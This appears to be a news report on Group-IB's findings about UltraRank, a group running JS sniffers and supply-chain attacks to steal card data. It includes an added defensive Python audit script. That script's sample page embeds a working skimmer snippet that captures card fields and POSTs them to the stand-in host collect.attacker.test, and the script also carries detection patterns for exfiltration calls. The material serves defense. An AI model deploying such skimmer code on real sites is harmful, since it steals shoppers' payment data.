The researchers write that since the end of 2019, groups operating JS sniffers have displaced banking Trojans as the main suppliers of text dumps of bank card data sold on specialized hacker forums. JS sniffers are one of the fastest-growing threats today: in less than a year and a half, the number of unique malware families identified by Group-IB experts has more than doubled, to 96.
Group-IB notes that each JS sniffer family is a set of samples with minor code differences that are injected into websites to intercept what users type: bank card numbers, names, addresses, logins, passwords, and so on. Sniffer operators typically pick sites built on particular CMSs, usually rarely updated ones, whose payment flows are not protected by 3-D Secure. The stolen data is sent to a server controlled by the criminals and then sold on darknet carder forums, most of whose participants are Russian-speaking cybercriminals.
If the bank that issued a card stolen by a JS sniffer has no behavioral analysis system capable of distinguishing the real cardholder's actions from an attacker's, the buyers of the card data cash out by purchasing goods with it and reselling them.
According to the experts, UltraRank consists of Russian-speaking hackers. The group operates three JS sniffer families, called FakeLogistics, WebRank and SnifLite. Over the course of its activity, UltraRank has built an autonomous business model with its own technical and organizational structure and its own system for selling and monetizing stolen payment data. For example, the group runs its own card shop, ValidCC. According to the shop's internal statistics, in 2019 its owners earned $5,000-7,000 a day selling card data the group had stolen itself, and a further $25,000-30,000 came from other vendors of stolen payment data who paid to list their goods in the shop.
Since 2015, UltraRank has infected 691 websites, mainly in Europe, Asia and the Americas. The attackers also chose larger targets, against which they planned considerably more complex supply-chain attacks. In particular, 13 providers of services to online retailers fell victim to the group, among them advertising and browser-notification services, web design agencies, marketing agencies and website developers. By injecting malicious code into these providers' scripts, the attackers intercepted customers' bank card data on the sites of every store that used the providers' products or technologies. Compromising those providers alone could have given the criminals access to more than 100,000 sites in total.
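The two preceding paragraphs describe what a sniffer has to do (hook form input, pick out the card fields, send them to an attacker-controlled host) and where it arrives from (an inline injection or a script pulled from a compromised third-party provider). The following Python script is an added example written for this page, not Group-IB tooling or any UltraRank code; it performs the kind of express audit the text calls for by parsing a page, flagging external scripts from hosts outside an allowlist, and scoring inline scripts against those three traits. The page, the script bodies and every hostname in it (`cdn.example-shop.test`, `tags.marketing-partner.test`, `collect.attacker.test`) are constructed for the demonstration, and the regexes are heuristics that produce leads for a human, not proof of compromise.

```python
"""Express audit of a checkout page's scripts for JS-sniffer indicators.

Added example for this page, not Group-IB tooling.  The sample page, its
scripts and all hostnames are constructed; the indicators are heuristics.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.external = []       # values of <script src="...">
        self.inline = []         # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


# Traits a sniffer needs: hook user input, pick out card fields, send them somewhere.
# "encoding" is a secondary signal (skimmers often base64 the payload).
INDICATORS = {
    "input_hook": re.compile(r"addEventListener\s*\(\s*['\"](submit|keyup|keydown|input|change|blur)['\"]", re.I),
    "card_fields": re.compile(r"\b(card|cc_?num|cvv|cvc|expir)|\bpan\b", re.I),
    "exfil_primitive": re.compile(r"fetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(|\.src\s*="),
    "encoding": re.compile(r"\b(btoa|atob|unescape|fromCharCode)\b"),
}
URL_RE = re.compile(r"https?://[A-Za-z0-9._-]+")


def audit_html(html, allowed_hosts):
    """Return external scripts served from hosts outside the allowlist and inline
    scripts that look like skimmers: input hook + card fields + exfiltration, or
    an exfiltration primitive combined with a URL to a non-allowlisted host."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = {"untrusted_external": [], "suspicious_inline": []}

    for src in parser.external:
        host = urlparse(src).hostname        # None for relative (same-origin) paths
        if host and host not in allowed_hosts:
            findings["untrusted_external"].append(src)

    for index, body in enumerate(parser.inline):
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        hosts = sorted({urlparse(u).hostname for u in URL_RE.findall(body)})
        untrusted = [h for h in hosts if h not in allowed_hosts]
        skimmer_shape = {"input_hook", "card_fields", "exfil_primitive"} <= set(hits)
        if skimmer_shape or ("exfil_primitive" in hits and untrusted):
            findings["suspicious_inline"].append(
                {"index": index, "indicators": hits, "untrusted_hosts": untrusted})
    return findings


ALLOWED_HOSTS = {"cdn.example-shop.test"}    # hypothetical first-party CDN

# Constructed page: one allowed and one unknown third-party script, a harmless
# analytics stub, a legitimate Luhn check that touches card fields but sends
# nothing, and an injected skimmer posting the fields to an attacker host.
SAMPLE_PAGE = """<html><body>
<script src="https://cdn.example-shop.test/checkout.js"></script>
<script src="https://tags.marketing-partner.test/tag.js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag() { dataLayer.push(arguments); }
</script>
<script>
  document.querySelector('[name="card_number"]').addEventListener('input', function (e) {
    var digits = e.target.value.replace(/\\D/g, ''), sum = 0;
    digits.split('').reverse().forEach(function (ch, i) {
      var d = +ch; if (i % 2) { d *= 2; if (d > 9) d -= 9; } sum += d;
    });
    e.target.setCustomValidity(sum % 10 ? 'Invalid card number' : '');
  });
</script>
<script>
  document.addEventListener('submit', function (e) {
    var form = e.target, data = {};
    ['card_number', 'card_expiry', 'cvv', 'cardholder_name'].forEach(function (n) {
      var el = form.querySelector('[name="' + n + '"]'); if (el) data[n] = el.value;
    });
    fetch('https://collect.attacker.test/gate', {method: 'POST', body: btoa(JSON.stringify(data))});
  });
</script>
</body></html>"""

if __name__ == "__main__":
    import json
    print(json.dumps(audit_html(SAMPLE_PAGE, ALLOWED_HOSTS), indent=2))
```

Run against the constructed page, the audit reports the marketing tag as an untrusted external script (the third-party vector: its contents change whenever the provider is compromised, so it needs review or Subresource Integrity, not just an allowlist entry) and flags only the last inline script, since the Luhn check hooks input and reads card fields but never exfiltrates anything. The same collector can be fed the body of each external script in turn to score them too.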
In February 2020, Group-IB specialists noticed that five websites built by the American marketing agency The Brandit Agency for its corporate clients were infected with JS sniffers. The experts immediately tried to contact the agency but received no response, although the malicious code was later removed from the sites. Investigating this attack allowed the team to uncover the attackers' infrastructure, link it to earlier incidents that had also used JS sniffers, and reconstruct the full history of the attacks.
Over the past five years, UltraRank has repeatedly changed its infrastructure and modified the malicious code in its arsenal, which is why researchers at other companies long misattributed its attacks to various other actors. UltraRank also strengthened its position by actively fighting competitors: the group broke into already compromised sites and appended its own JS sniffer to the code a rival criminal group had injected, so that the stolen card data was "sent" to two groups at once.
"The latency of cybercrime using JS sniffers leaves a lot of room for these cybercriminals. The malicious code is introduced into the site completely unnoticed by the site owner and by its users, and can 'collect' customers' bank card data for a long time while remaining in the shadows. However, the secrecy of this crime does not reduce its danger: in addition to the users themselves, banks and online business owners can fall into this chain. Do not underestimate this threat and, given the growth spurt in the JS sniffer market that took place in less than 1.5 years, online businesses that accept online payments need to regularly conduct express audits of their sites to find and remove such malicious code," says Viktor Okorokov, Group-IB Threat Intelligence specialist.